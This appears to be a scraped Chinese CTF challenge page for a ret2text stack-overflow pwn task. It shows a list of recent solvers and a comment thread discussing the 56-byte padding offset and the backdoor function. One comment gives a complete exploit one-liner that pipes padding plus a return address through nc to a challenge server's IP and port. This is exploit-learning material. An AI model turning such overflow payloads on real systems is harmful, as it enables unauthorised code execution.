评分(1)
解题动态
NEIL. 攻破了该题 1天前
20230302203 攻破了该题 2天前
20230302248 攻破了该题 3天前
Kris_zhk 攻破了该题 4天前
Mixt 攻破了该题 4天前
GuQing 攻破了该题 4天前
walt 攻破了该题 7天前
test_me 攻破了该题 7天前
zhaowenxin 攻破了该题 9天前
20230302227 攻破了该题 9天前
YANGLINSHENG2503940126 攻破了该题 10天前
叶... 攻破了该题 10天前
kesens 攻破了该题 10天前
星星月亮 攻破了该题 10天前
淋༲ 攻破了该题 10天前
LKY111mcrla 攻破了该题 10天前
A10ng 攻破了该题 11天前
20230302229 攻破了该题 12天前
本村无敌手 攻破了该题 12天前
评论
modeng 28天前
举报
这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502
王安小子 1月前
举报
python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok
乌鸦乌鸦乌鸦乌鸦 5月前
举报
为什么答案是56字节,我测出来是40字节
scust 5月前
举报
看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节
weiyouzhunze 7月前
举报
栈溢出漏洞利用
afag 8月前
举报
0x30+8填充
17773146280 9月前
举报
简单的ret2text题目,后门函数地址加上缓冲区长度就可以了
YellowZy 1年前
举报
应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充
255a 1年前
举报
修改main函数返回地址的rcx的值
da111sy 1年前
举报
https://zaoganmaqule.github.io/2024/08/21/bugku-ctf%E7%9A%84pwn%E9%A2%98%E8%A7%A3/#more
puppet 1年前
举报
能看见这么多题解真好
xiaobai568 1年前
举报
利用后门函数获取flag